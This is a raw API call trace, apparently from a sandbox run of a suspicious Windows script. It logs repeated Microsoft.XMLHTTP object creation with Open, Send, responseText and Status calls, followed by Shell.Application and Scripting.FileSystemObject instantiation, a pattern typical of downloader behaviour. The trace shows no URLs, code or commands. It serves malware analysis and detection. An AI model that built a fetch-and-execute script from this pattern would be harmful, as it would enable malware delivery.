	[0278.960] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0278.960] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0278.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0278.960] ??2@YAPEAX_K@Z () returned 0x62f330
	[0278.960] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0278.960] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0278.961] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0278.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0278.961] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0278.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0278.961] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0278.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.961] longjmp () 
	[0278.961] longjmp () 
	[0278.961] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0278.961] SysStringLen (param_1=0x0) returned 0x0
	[0278.961] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0278.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0278.961] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0278.961] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0278.961] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0278.961] ??2@YAPEAX_K@Z () returned 0x62f310
	[0278.962] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0278.962] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0278.962] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0278.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0278.962] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0278.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0278.962] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0278.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.962] longjmp () 
	[0278.962] longjmp () 
	[0278.962] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0278.962] SysStringLen (param_1=0x0) returned 0x0
	[0278.962] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0278.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0278.963] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77c0) returned 0x0
	[0278.963] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0278.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7828) returned 0x0
	[0278.963] ??2@YAPEAX_K@Z () returned 0x62f330
	[0278.963] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7828, pUnkSite=0x62f330) 
	[0278.963] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0278.963] XMLHTTPRequest:IUnknown:Release (This=0x49c7828) returned 0x0
	[0278.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77c0) returned 0x0
	[0278.963] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77c0) returned 0x3
	[0278.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0278.963] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0278.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0278.963] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0278.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.157] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0279.157] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0279.157] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.157] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0279.157] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0279.158] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0279.158] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0279.158] SysStringLen (param_1=0x0) returned 0x0
	[0279.158] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0279.158] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0279.158] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0279.158] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0279.158] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0279.158] ??2@YAPEAX_K@Z () returned 0x62f350
	[0279.158] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0279.158] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0279.158] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0279.158] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0279.158] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0279.159] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0279.159] SysStringLen (param_1=0x0) returned 0x0
	[0279.159] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0279.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0279.161] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0279.162] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0279.162] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0279.162] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0279.162] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0279.748] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0279.748] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0279.748] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0279.750] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0279.750] SysStringLen (param_1=0x0) returned 0x0
	[0279.750] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0279.750] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0279.751] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c77c0) returned 0x0
	[0279.751] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0279.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0279.751] ??2@YAPEAX_K@Z () returned 0x62f330
	[0279.751] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0279.751] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0279.751] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0279.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c77c0) returned 0x0
	[0279.751] XMLHTTPRequest:IUnknown:AddRef (This=0x49c77c0) returned 0x3
	[0279.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0279.751] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c77c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0279.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c77c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0279.754] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0279.754] SysStringLen (param_1=0x0) returned 0x0
	[0279.754] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0279.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
